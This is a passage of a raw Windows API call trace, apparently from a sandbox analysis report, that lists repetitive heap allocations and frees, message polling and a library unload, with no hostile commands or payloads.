RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.926] FreeLibrary (hLibModule=0x75c90000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.928] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.928] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0180.929] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.929] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0180.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0180.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0180.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0180.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0180.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0180.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.933] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0180.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.936] 